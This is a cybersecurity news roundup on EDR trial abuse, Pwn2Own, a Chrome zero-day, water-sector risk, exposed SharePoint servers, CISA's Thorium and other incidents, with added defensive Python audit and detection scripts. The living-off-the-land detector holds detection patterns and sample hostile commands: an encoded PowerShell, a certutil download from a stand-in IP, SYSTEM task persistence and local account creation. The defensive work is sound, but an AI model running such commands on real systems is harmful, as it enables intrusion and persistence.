Hackers Exploit EDR Free Trials to Bypass Endpoint Security
Cybersecurity researchers have identified an attack technique in which threat actors abuse free trial versions of endpoint detection and response (EDR) software. The approach lets attackers weaken an organization's endpoint defenses and run malware with a lower chance of detection, raising concerns about endpoint resilience, licensing controls, and attack surface management.
The Attack Path: Leveraging the Freemium Model
EDR vendors routinely offer free trials of their agents to drive enterprise adoption. Threat actors have found that, during the trial period, some controls and telemetry functions are throttled or absent. Using phishing or direct downloads, they persuade users or administrators to install a trial agent on production endpoints. In a lab environment, researchers showed that some trial agents did not upload complete telemetry to the vendor's cloud, received threat intelligence updates with a delay, or did not enforce the full detection rule set.
Impacts and Risks
With a weakened agent in place, malware tailored to the expected detection profile can run on the endpoint, often slipping past the signature- and behavior-based detections that a fully licensed agent would apply. Lateral movement, data exfiltration, and ransomware deployment then proceed with a lower probability of alerting defenders. Incident responders also reported delayed generation of forensic artifacts and gaps in real-time monitoring, which complicates both detection and evidence collection.
Recommendations and Next Steps
Security teams should control software installation tightly, verify the license state and tenant enrollment of every EDR agent across the fleet, and block execution of trial installers in enterprise environments. A security agent appearing on a host outside the normal deployment tooling, or one reporting to a tenant the organization does not own, is itself worth an alert. EDR vendors are advised to keep core detection and reporting capabilities at parity between trial and paid licenses and to label or alert clearly when a trial agent is installed on critical infrastructure.
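One way to run the license and tenant check recommended above, as example code added here rather than anything from the article or an EDR vendor: it reads an exported agent inventory and flags hosts with a second agent, a trial license, an agent enrolled in a tenant the organization does not own, or an install that did not come from the deployment account. The product name ExampleEDR, the tenant IDs, the account names and the inventory rows are constructed for the example.

```python
"""Audit an endpoint inventory for unsanctioned, duplicate or trial EDR agents.

Added example; not code from the article or from any EDR vendor. Product
names, tenant IDs, accounts and the inventory rows below are constructed.
Feed it the agent list your asset or MDM tooling exports.
"""
from dataclasses import dataclass
from typing import Iterable


@dataclass(frozen=True)
class Agent:
    host: str
    product: str       # product string as reported by the endpoint
    tenant_id: str     # cloud tenant / customer ID the agent reports to
    license_type: str  # "paid", "trial" or "unknown"
    installed_by: str  # account that ran the installer


# Policy values for this example (assumptions, not a vendor default).
SANCTIONED_PRODUCT = "ExampleEDR"
SANCTIONED_TENANT = "tenant-0001"
DEPLOYMENT_ACCOUNTS = {"svc-deploy"}


def audit(agents: Iterable[Agent]) -> dict[str, list[str]]:
    """Return {host: [finding, ...]} for hosts that violate the policy.

    Checks, per host:
      - an agent reporting to a tenant other than ours (an attacker-owned
        trial sign-up looks exactly like this)
      - a trial or unknown license on any agent
      - an agent not installed by the deployment account
      - more than one EDR agent on the host
    """
    by_host: dict[str, list[Agent]] = {}
    for agent in agents:
        by_host.setdefault(agent.host, []).append(agent)

    findings: dict[str, list[str]] = {}
    for host, installed in sorted(by_host.items()):
        issues: list[str] = []
        for a in installed:
            if a.product != SANCTIONED_PRODUCT:
                issues.append(f"unsanctioned product {a.product}")
            elif a.tenant_id != SANCTIONED_TENANT:
                issues.append(f"{a.product} reports to foreign tenant {a.tenant_id}")
            if a.license_type != "paid":
                issues.append(f"{a.product} licence type is {a.license_type}")
            if a.installed_by not in DEPLOYMENT_ACCOUNTS:
                issues.append(f"{a.product} installed by {a.installed_by}")
        if len(installed) > 1:
            names = ", ".join(sorted(a.product for a in installed))
            issues.append(f"{len(installed)} EDR agents present: {names}")
        if issues:
            findings[host] = issues
    return findings


# Constructed inventory: one clean host, one with a foreign-tenant trial agent
# installed by a user, one with an unsanctioned second product.
SAMPLE_INVENTORY = [
    Agent("ws-001", "ExampleEDR", "tenant-0001", "paid", "svc-deploy"),
    Agent("ws-002", "ExampleEDR", "tenant-0001", "paid", "svc-deploy"),
    Agent("ws-002", "ExampleEDR", "tenant-9f3c", "trial", "CORP\\jdoe"),
    Agent("srv-db-01", "ExampleEDR", "tenant-0001", "paid", "svc-deploy"),
    Agent("srv-db-01", "OtherEDR", "acme-trial-77", "trial", "CORP\\admin2"),
]

if __name__ == "__main__":
    for host, issues in audit(SAMPLE_INVENTORY).items():
        print(host)
        for issue in issues:
            print("  -", issue)
```

The foreign-tenant rule is the one that catches the scenario in the article: a trial agent from the right vendor, with a valid-looking install, that reports to a tenant the attacker controls. Run it on every inventory export, not once.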
Meta Ups Security Stakes with Major Pwn2Own Sponsorship Focusing on WhatsApp and Wearables
Meta has significantly increased its involvement in independent vulnerability research by sponsoring the upcoming Pwn2Own hacking competition, earmarking record-setting bounties for smartphone, WhatsApp, and wearable device exploits. This marks a strategic push to harden critical communication and consumer health platforms against real-world threats through coordinated disclosure.
Pwn2Own Ireland 2025 Incentive Structure
Meta’s sponsorship includes a $1 million reward for a demonstrated zero-click remote code execution (RCE) exploit against WhatsApp, the highest payout in the history of the event. Exploits targeting wearables and smartphones are also eligible for substantial bounties. Eligible targets include iOS and Android smartphones, Meta Quest devices, and Wear OS smartwatches. Researchers must deliver a full technical writeup under the Zero Day Initiative’s responsible disclosure policy.
Technical Relevance and Industry Impact
The focus on WhatsApp zero-click exploits highlights ongoing attacker interest in messaging apps that serve as foundational communications infrastructure for billions. Zero-click exploits are especially valuable because they require no user interaction—making them covertly deployable in APT campaigns. The inclusion of wearable devices reflects growing concern over personal health and biometric data exposure.
Meta’s Security Posture Evolution
By sponsoring targeted hacking contests, Meta aims to foster closer collaboration with the security research community and to get previously unknown vulnerabilities fixed before hostile actors can weaponize them. The outcome of Pwn2Own will likely set new benchmarks for vulnerability reward programs industry-wide.
Google Project Zero Adapts Vulnerability Disclosure, Chrome Flaw (CVE-2025-6558) Exploited
Google’s Project Zero has changed its disclosure policy: within a week of reporting a bug it now publishes the affected vendor and product, the date reported, and the 90-day deadline, ahead of any technical detail. Separately, Google patched a high-severity Chrome vulnerability, CVE-2025-6558 (insufficient validation of untrusted input in the ANGLE and GPU components), which Google’s Threat Analysis Group (TAG) reported and which is being exploited in the wild.
Chrome ANGLE and GPU Vulnerability Analysis
The flaw is reachable from a crafted HTML page and abuses Chrome’s graphics abstraction layer (ANGLE) and the GPU process; Google’s advisory describes the impact as a potential escape from the renderer sandbox. It was fixed in Chrome 138.0.7204.157/.158, so the first check for any fleet is that browsers have reached at least that build. TAG’s detection of exploitation suggests targeted campaigns against at-risk users, but the full exploit chain has not been disclosed.
Project Zero’s Policy Update
The policy change is intended to increase vendor accountability and speed patch adoption. Because the 90-day clock runs from the report date, and that date is now public, end users and enterprises can tell how long a vendor has had a fix outstanding even before the technical details are released.
Broader Implications
This should push vendors to ship fixes faster and gives downstream maintainers and incident responders an early signal that a fix is pending. The confirmed in-the-wild exploitation of CVE-2025-6558 is a reminder that the browser remains a primary initial-access vector.
The Water Sector Faces Escalating Cybersecurity Risk
Security researchers and critical infrastructure authorities have warned of heightened and continuing cyber risk in the water sector. A combination of aging operational technology, growing OT/IT convergence, and inadequately patched systems has made water utilities a prime target for both ransomware operators and nation-state-aligned groups.
Threat Landscape and Attack Techniques
Recent analysis suggests water sector networks are being actively probed for common vulnerabilities in SCADA systems, remote access tools, and unsegmented corporate networks. Attackers are increasingly deploying malware that targets programmable logic controllers (PLCs), capable of manipulating water treatment processes, chemical dosing, and supply valves.
Vulnerabilities and Response
Incident response teams have documented cases where attackers used “living off the land” tools—native operating system commands and legitimate utilities—to escalate privileges, conduct reconnaissance, and achieve persistence. Weak segmentation between IT and OT environments has allowed attackers to move laterally, potentially threatening safe drinking water delivery.
Sector Recommendations
CISA and sector-specific experts recommend segmenting IT and OT networks, promptly patching internet-exposed systems and remote access points, and strengthening monitoring for anomalous process and account activity. Water utilities are encouraged to run regular tabletop exercises that test both cyber and physical incident response procedures.
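Detection logic for the living-off-the-land activity described above and the monitoring the recommendations call for, as an added example that is not from the article or any product: it parses process-creation events (constructed here in a simplified key=value form) and flags native Windows binaries invoked with the arguments attackers use for download, persistence, reconnaissance and account creation, plus any such binary launched from an Office or browser parent. The rule set, field names and log lines are assumptions for the example; map your EDR or Sysmon fields onto them before use.

```python
"""Flag living-off-the-land activity in process-creation logs.

Added example, not from the article or any vendor product. The log lines
below are constructed in a simplified key=value form (host, user, parent,
image, cmd); map your own EDR/Sysmon event fields onto that before use.
"""
import re
from dataclasses import dataclass

# Native binaries commonly abused for download, execution, persistence and
# recon, with the argument patterns that distinguish abuse from routine use.
# Patterns are regexes applied to the lower-cased command line.
LOLBIN_RULES: dict[str, list[tuple[str, str]]] = {
    "certutil.exe": [(r"-urlcache", "download via certutil"),
                     (r"-decode", "decode payload via certutil")],
    "powershell.exe": [(r"\s-e(nc|ncodedcommand)?\s", "encoded PowerShell"),
                       (r"downloadstring|invoke-webrequest|iwr\s", "PowerShell download cradle"),
                       (r"-nop\b|-noprofile", "PowerShell profile bypass")],
    "mshta.exe": [(r"https?://|javascript:|vbscript:", "mshta remote/script execution")],
    "rundll32.exe": [(r"javascript:|\\\\", "rundll32 script or UNC execution")],
    "wmic.exe": [(r"process\s+call\s+create", "process creation via WMIC"),
                 (r"/node:", "remote WMI target")],
    "schtasks.exe": [(r"/create", "scheduled task persistence")],
    "reg.exe": [(r"currentversion\\run", "Run-key persistence")],
    "net.exe": [(r"user\s+\S+\s+\S+\s+/add", "local account creation"),
                (r"localgroup\s+administrators\s+\S+\s+/add", "admin group addition")],
}

# Parent processes from which a LOLBin launch is almost always suspicious.
USER_APP_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}

LINE_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


@dataclass(frozen=True)
class Finding:
    host: str
    image: str
    reason: str
    cmd: str


def parse_line(line: str) -> dict[str, str]:
    """key=value fields; values may be double-quoted to allow spaces."""
    return {k: v.strip('"') for k, v in LINE_RE.findall(line)}


def evaluate(event: dict[str, str]) -> list[Finding]:
    image = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmd = event.get("cmd", "")
    cmd_l = cmd.lower()
    host = event.get("host", "?")
    out: list[Finding] = []
    for pattern, reason in LOLBIN_RULES.get(image, []):
        if re.search(pattern, cmd_l):
            out.append(Finding(host, image, reason, cmd))
    if image in LOLBIN_RULES and parent in USER_APP_PARENTS:
        out.append(Finding(host, image, f"launched by user application {parent}", cmd))
    return out


def scan(lines) -> list[Finding]:
    return [f for line in lines for f in evaluate(parse_line(line))]


# Constructed events: a phishing-borne download cradle, persistence and an
# account added on an OT jump host, and two routine admin actions that
# should not fire.
SAMPLE_LOG = [
    'ts=2025-07-30T08:12:03Z host=eng-ws-14 user=CORP\\jsmith parent=winword.exe image=powershell.exe '
    'cmd="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    'ts=2025-07-30T08:12:09Z host=eng-ws-14 user=CORP\\jsmith parent=powershell.exe image=certutil.exe '
    'cmd="certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\\Users\\Public\\a.txt"',
    'ts=2025-07-30T08:15:41Z host=ot-jump-01 user=CORP\\jsmith parent=cmd.exe image=schtasks.exe '
    'cmd="schtasks.exe /create /sc onlogon /tn Updater /tr C:\\Users\\Public\\a.exe /ru SYSTEM"',
    'ts=2025-07-30T08:16:02Z host=ot-jump-01 user=CORP\\jsmith parent=cmd.exe image=net.exe '
    'cmd="net.exe user svc_backup P@ssw0rd! /add"',
    'ts=2025-07-30T09:00:00Z host=it-admin-02 user=CORP\\ops parent=explorer.exe image=powershell.exe '
    'cmd="powershell.exe -File C:\\Scripts\\rotate-logs.ps1"',
    'ts=2025-07-30T09:01:00Z host=it-admin-02 user=CORP\\ops parent=cmd.exe image=certutil.exe '
    'cmd="certutil.exe -store My"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.host:12} {f.image:16} {f.reason}: {f.cmd}")
```

The rules key on the argument patterns rather than on the binary alone, because certutil and PowerShell are run legitimately all day; the two it-admin-02 events show that distinction. On OT jump hosts and engineering workstations the bar should be lower still, since the activity in the article (recon, privilege escalation, persistence) rarely has a legitimate counterpart there.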
17,000+ SharePoint Servers Exposed; 840 Vulnerable to 0-Day
More than 17,000 Microsoft SharePoint servers have been found exposed to the public internet, 840 of which are vulnerable to an actively exploited zero-day, according to recent vulnerability research. Threat actors are scanning for and exploiting these systems, raising supply chain and data integrity concerns across government, critical infrastructure, and enterprise targets.
Identification and Risk Analysis
Internet-wide scans show that a large share of reachable SharePoint servers, all of them self-hosted SharePoint Server deployments rather than the hosted SharePoint Online service, run unpatched versions, lack basic hardening, and expose an outdated collaboration platform directly to external threats. Of the roughly 17,000 identified servers, at least 840 are confirmed susceptible to an actively exploited zero-day that the research does not name.
Exploitation and Threat Activities
Attackers are leveraging the vulnerability to gain initial access to sensitive corporate resources, exfiltrate data, install backdoors, and launch secondary attacks across interconnected environments. The ease of exploitation raises concerns about potential for ransomware, business email compromise, and information theft campaigns targeting organizations of all sizes.
Mitigation and Defensive Measures
Microsoft and security vendors advise immediate patching, disabling legacy features where possible, and network segmentation to limit the blast radius of a compromise. Because attackers are already installing backdoors, a server that sat exposed while vulnerable should be treated as potentially compromised even after patching: pair the update with a compromise assessment rather than assuming the patch evicts an intruder. Organizations are also urged to run vulnerability scanning against their external footprint and to consume threat intelligence feeds so new exploit attempts are recognized quickly.
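An exposure check of the kind the scans above describe, added here as example code (not from the article, Microsoft, or any scanner vendor): given HTTP response headers collected from internet-facing hosts, it identifies on-premises SharePoint Server by its MicrosoftSharePointTeamServices, X-SharePointHealthScore and SPRequestGuid response headers, parses the build number and compares it with a minimum patched build. The article does not name the zero-day or the fixing build, so MIN_PATCHED_BUILD is a placeholder to replace with the value from the vendor advisory you are acting on; the scan records are constructed.

```python
"""Classify internet-facing SharePoint servers from scan data.

Added example; not from the article, Microsoft or any scanner vendor. It
works on HTTP response headers (constructed below) of the kind a port
scanner or web crawler records. On-premises SharePoint Server identifies
itself with a MicrosoftSharePointTeamServices header carrying the build
number, which is what the classifier keys on.
"""
from dataclasses import dataclass
from typing import Optional

# Placeholder threshold (assumption for this example, not a real fix build).
# Replace with the build number from the vendor advisory you are acting on.
MIN_PATCHED_BUILD = (16, 0, 0, 9999)


@dataclass(frozen=True)
class Assessment:
    target: str
    is_sharepoint: bool
    build: Optional[tuple[int, ...]]
    verdict: str  # not-sharepoint | sharepoint-unknown-build | below-threshold | at-or-above-threshold


def parse_build(value: str) -> Optional[tuple[int, ...]]:
    """'16.0.0.5456' -> (16, 0, 0, 5456); anything malformed -> None."""
    parts = value.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        return None
    return tuple(int(p) for p in parts)


def assess(target: str, headers: dict[str, str]) -> Assessment:
    # Header names are case-insensitive; normalise once.
    h = {k.lower(): v for k, v in headers.items()}
    sp_header = h.get("microsoftsharepointteamservices")
    # Some deployments strip the version header but keep other SharePoint
    # fingerprints; treat those as SharePoint with an unknown build rather
    # than silently dropping them from the exposed set.
    fingerprint = (sp_header is not None
                   or "x-sharepointhealthscore" in h
                   or "sprequestguid" in h)
    if not fingerprint:
        return Assessment(target, False, None, "not-sharepoint")
    build = parse_build(sp_header) if sp_header else None
    if build is None:
        return Assessment(target, True, None, "sharepoint-unknown-build")
    verdict = "below-threshold" if build < MIN_PATCHED_BUILD else "at-or-above-threshold"
    return Assessment(target, True, build, verdict)


def summarise(results: list[Assessment]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for r in results:
        counts[r.verdict] = counts.get(r.verdict, 0) + 1
    return counts


# Constructed scan output: response headers keyed by target address.
SAMPLE_SCAN = {
    "198.51.100.10": {"Server": "Microsoft-IIS/10.0",
                      "MicrosoftSharePointTeamServices": "16.0.0.5456",
                      "X-SharePointHealthScore": "0"},
    "198.51.100.11": {"Server": "Microsoft-IIS/10.0",
                      "MicrosoftSharePointTeamServices": "16.0.0.10337"},
    "198.51.100.12": {"Server": "Microsoft-IIS/10.0",
                      "SPRequestGuid": "c0ffee00-0000-4000-8000-000000000000"},
    "198.51.100.13": {"Server": "nginx/1.24.0"},
}

if __name__ == "__main__":
    results = [assess(t, hdrs) for t, hdrs in SAMPLE_SCAN.items()]
    for r in results:
        print(f"{r.target:16} {r.verdict:24} build={r.build}")
    print(summarise(results))
```

The unknown-build bucket matters: a server that hides its version header is still an exposed SharePoint instance and still needs a patch-level check by other means, which is why it is kept separate from the not-sharepoint set instead of being discarded.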
CISA Releases Thorium: A Powerful Open-Source Malware & Forensics Platform
The U.S. Cybersecurity and Infrastructure Security Agency (CISA), working with Sandia National Laboratories, has released Thorium, an open-source platform designed to speed up malware analysis, digital forensics, and incident response for enterprise defenders and researchers alike. The aim is to widen access to capable forensic tooling and help organizations respond more effectively to modern threats.
Thorium Platform Overview
Thorium integrates automated malware unpacking, deep binary analysis, behavior-based anomaly detection, and reporting tools into a unified, modular system. Its architecture is built for extensibility, supporting user-developed plugins for specific file formats, obfuscation techniques, and threat actor tradecraft.
Technical Capabilities
The platform supports rapid extraction and classification of malware indicators, cross-references threat intelligence sources, and enables “live” memory captures for suspected compromised hosts. Its UI is optimized for use by both seasoned forensics investigators and IT generalists responding to new incidents.
Adoption and Community Impact
By making Thorium open-source, CISA intends to boost collaboration across public and private sectors, speed up new threat research, and reduce barriers for organizations with limited budgets or regional access to commercial forensic suites. The project’s roadmap includes future integrations with SIEM and threat intelligence sharing platforms.
FSB-Linked Hackers Target Moscow Diplomats Using ISP-Level Access
Cybersecurity researchers have uncovered a Russian state-aligned cyber-espionage campaign targeting diplomats in Moscow using advanced techniques that leverage Internet Service Provider (ISP) level access. Attribution points to groups linked with the Russian Federal Security Service (FSB), employing methods designed to bypass perimeter defenses and achieve persistent access to sensitive diplomatic communications.
Attack Vector Analysis
The attackers used their position inside ISP infrastructure to tamper with the targets' traffic in transit, delivering tailored payloads through on-path ("man in the middle") interception of locally routed connections and bypassing perimeter defenses that treat the upstream network as trustworthy. An on-path position does not by itself defeat TLS with proper certificate validation; what it gives an attacker is full control over unencrypted traffic and the ability to redirect or substitute content the target is asked to accept, which is why such campaigns hinge on getting an implant onto the target's device.
Persistence and Counter-Detection Measures
These implants offered command and control (C2) functionality with counter-forensics and self-deletion routines. By launching attacks within Russia’s borders and leveraging local service providers, attackers substantially reduced detection by external monitoring systems.
Targets and Implications
Initial reporting highlights diplomatic missions and expatriate organizations operating in Moscow as principal targets. The campaign underscores the risk posed by advanced actors with state access, particularly in adversarial nations where telecom infrastructure can be co-opted for surveillance and espionage.
FTX Japan Data Leaks Affect Over 35,000 Former Users After Platform Closure
Despite the platform’s shutdown over a year ago, FTX Japan was recently found to be leaking personal and financial data on more than 35,000 users. The data includes sensitive identity and account details that remain exposed online, presenting heightened fraud and targeted attack risks for affected individuals.
Exposure Timeline and Discovery
Backup and archival infrastructure tied to FTX Japan remained online long after the platform closed, keeping decommissioned user data reachable. Security researchers only recently flagged these databases as open to unauthorized access, triggering efforts to secure the remaining assets.
Types of Data and Threat Implications
The exposed data set reportedly contains know-your-customer (KYC) documents, internal communications, account balances, and transaction histories, a valuable resource for identity thieves, cryptocurrency scammers, and phishing campaigns. That the data stayed accessible after the platform's shutdown points to systemic weaknesses in how the crypto sector decommissions assets.
Call for Stronger Controls
Experts urge all digital asset platforms to adopt strict retention, encryption, and offboarding protocols for sensitive user data and to routinely audit exposed infrastructure beyond the platform’s active life to prevent repeat incidents of this kind.